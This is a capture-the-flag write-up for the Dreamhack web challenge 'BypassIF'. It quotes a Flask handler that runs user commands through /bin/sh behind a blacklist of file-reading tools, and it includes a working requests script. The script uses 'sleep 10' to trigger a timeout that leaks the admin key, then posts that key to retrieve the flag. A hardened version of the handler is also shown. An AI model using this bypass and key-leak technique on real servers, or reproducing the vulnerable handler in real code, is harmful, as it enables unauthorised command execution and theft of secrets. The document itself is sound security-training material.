[Dreamhack] BypassIF (WEB)

WEB HACKING/Dreamhack

by koharin 2025. 5. 12. 17:59

# Excerpt of the challenge's app.py (the '...' marks parts the page omits).
# Imports added so the excerpt is self-describing; KEY, FLAG and guest_key
# are defined in the omitted part of the file.
import string
import subprocess
from flask import Flask, request, render_template, redirect

app = Flask(__name__)

def filter_cmd(cmd):
    alphabet = list(string.ascii_lowercase)
    alphabet.extend([' '])
    num = '0123456789'
    alphabet.extend(num)
    # blacklist: a command containing any of these words is rejected
    command_list = ['flag','cat','chmod','head','tail','less','awk','more','grep']

...

@app.route('/flag', methods=['POST'])
def flag():
    # POST request
    if request.method == 'POST':
        key = request.form.get('key', '')
        cmd = request.form.get('cmd_input', '')
        if cmd == '' and key == KEY:
            return render_template('flag.html', txt=FLAG)
        elif cmd == '' and key == guest_key:
            return render_template('guest.html', txt=f"guest key: {guest_key}")
        # 'or' here: a non-empty cmd is enough, no key required
        if cmd != '' or key == KEY:
            if not filter_cmd(cmd):
                try:
                    output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
                    return render_template('flag.html', txt=output.decode('utf-8'))
                except subprocess.TimeoutExpired:
                    # the timeout handler renders the admin KEY into the page
                    return render_template('flag.html', txt=f'Timeout! Your key: {KEY}')
                except subprocess.CalledProcessError:
                    return render_template('flag.html', txt="Error!")
            return render_template('flag.html')
        else:
            return redirect('/')
    else:
        return render_template('flag.html')

Looking at the code, cmd is executed whenever cmd != '' or key == KEY. Because the two conditions are joined with or, you do not need to know key at all: cmd only has to be a non-empty string.

If cmd is a sleep command, the 5-second timeout fires and the TimeoutExpired handler prints KEY into the page, so KEY can be recovered (sleep is not on the blacklist).

After that, the cmd == '' and key == KEY branch prints the flag.
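The two defects described above, modelled as pure functions so they can be checked without a server (added example, not the challenge's or the author's code; KEY, GUEST_KEY, FLAG and the `outcome` parameter standing in for the subprocess result are constructed assumptions). The vulnerable function mirrors the handler's branch order; the fixed one shows the hardened decision and an error message that no longer carries the secret.

```python
import hmac

# Constructed stand-ins for the challenge's secrets (not the real values).
KEY = "constructed-admin-key"
GUEST_KEY = "constructed-guest-key"
FLAG = "DH{constructed}"

def handle_flag_vulnerable(cmd: str, key: str, outcome: str = "ok") -> str:
    """Response text of the page's /flag handler, branch order preserved.
    The shell call is replaced by `outcome` ('ok', 'timeout' or 'error');
    the blacklist check is omitted because the page only shows part of it."""
    if cmd == "" and key == KEY:
        return f"flag:{FLAG}"
    if cmd == "" and key == GUEST_KEY:
        return f"guest key: {GUEST_KEY}"
    if cmd != "" or key == KEY:        # 'or': any non-empty cmd passes with no key at all
        if outcome == "timeout":
            return f"Timeout! Your key: {KEY}"   # error page echoes the admin secret
        if outcome == "error":
            return "Error!"
        return f"exec:{cmd}"
    return "redirect:/"

def handle_flag_fixed(cmd: str, key: str, outcome: str = "ok") -> str:
    """Hardened form: authenticate first (constant-time compare), then decide
    what the caller may do; error text never references a secret."""
    is_admin = hmac.compare_digest(key.encode(), KEY.encode())
    is_guest = hmac.compare_digest(key.encode(), GUEST_KEY.encode())
    if not (is_admin or is_guest):
        return "redirect:/"            # unauthenticated requests never reach the shell
    if cmd == "":
        return f"flag:{FLAG}" if is_admin else f"guest key: {GUEST_KEY}"
    if not is_admin:
        return "redirect:/"            # guest key grants no command execution
    if outcome == "timeout":
        return "Timeout!"              # same branch, secret removed from the message
    if outcome == "error":
        return "Error!"
    return f"exec:{cmd}"
```

The first function reproduces the key-less timeout leak; the second returns a redirect for the same request and a secret-free message even when an admin command times out.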

import requests

chall_url = "http://host8.dreamhack.games:14004/flag"

# Step 1: a non-empty cmd satisfies "cmd != '' or key == KEY" without a key;
# sleep 10 exceeds the 5-second timeout, so the handler prints KEY.
data = {"cmd_input": "sleep 10"}
res = requests.post(chall_url, data=data)
print(res.text)
key = res.text.split('<pre>Timeout! Your key: ')[1].split('</pre>')[0]
print(key)

# Step 2: empty cmd plus the recovered key hits "cmd == '' and key == KEY".
data = {"key": key}
res = requests.post(chall_url, data=data)
print(res.text)

$ python3 ex.py
<!doctype html>
<html>
  <head>
    <link rel="stylesheet" href="/static/css/bootstrap.min.css">
    <link rel="stylesheet" href="/static/css/bootstrap-theme.min.css">
    <link rel="stylesheet" href="/static/css/non-responsive.css">
    <title>Flag | Dreamhack </title>



  </head>
<body>
      <!-- Fixed navbar -->
      <nav class="navbar navbar-default navbar-fixed-top">
        <div class="container">
          <div class="navbar-header">
            <a class="navbar-brand" href="/">BypassIF</a>
          </div>
          <div id="navbar">
            <ul class="nav navbar-nav">
              <li><a href="/">index page</a></li>
            </ul>
          </div><!--/.nav-collapse -->
        </div>
      </nav><br/><br/><br/>
    <div class="container">

<h1>hello admin</h1>
<form action="/flag" method="POST">
  <div class="row">
    <div class="col-md-6 form-group">
      <br/><input type="text" class="form-control" placeholder="ls" name="cmd_input" required>
    </div>
  </div>
  <button type="submit" class="btn btn-default">Submit</button>
</form>
<br/><br/>

  <pre>Timeout! Your key: 409ac0d96943d3da52f176ae9ff2b974</pre>


    </div> <!-- /container -->

    <!-- Bootstrap core JavaScript -->
    <script src="/static/js/jquery.min.js"></script>
    <script src="/static/js/bootstrap.min.js"></script>
</body>
</html>
409ac0d96943d3da52f176ae9ff2b974
<!doctype html>
<html>
  <head>
    <link rel="stylesheet" href="/static/css/bootstrap.min.css">
    <link rel="stylesheet" href="/static/css/bootstrap-theme.min.css">
    <link rel="stylesheet" href="/static/css/non-responsive.css">
    <title>Flag | Dreamhack </title>



  </head>
<body>
      <!-- Fixed navbar -->
      <nav class="navbar navbar-default navbar-fixed-top">
        <div class="container">
          <div class="navbar-header">
            <a class="navbar-brand" href="/">BypassIF</a>
          </div>
          <div id="navbar">
            <ul class="nav navbar-nav">
              <li><a href="/">index page</a></li>
            </ul>
          </div><!--/.nav-collapse -->
        </div>
      </nav><br/><br/><br/>
    <div class="container">

<h1>hello admin</h1>
<form action="/flag" method="POST">
  <div class="row">
    <div class="col-md-6 form-group">
      <br/><input type="text" class="form-control" placeholder="ls" name="cmd_input" required>
    </div>
  </div>
  <button type="submit" class="btn btn-default">Submit</button>
</form>
<br/><br/>

  <pre>DH{}</pre>


    </div> <!-- /container -->

    <!-- Bootstrap core JavaScript -->
    <script src="/static/js/jquery.min.js"></script>
    <script src="/static/js/bootstrap.min.js"></script>
</body>
</html>
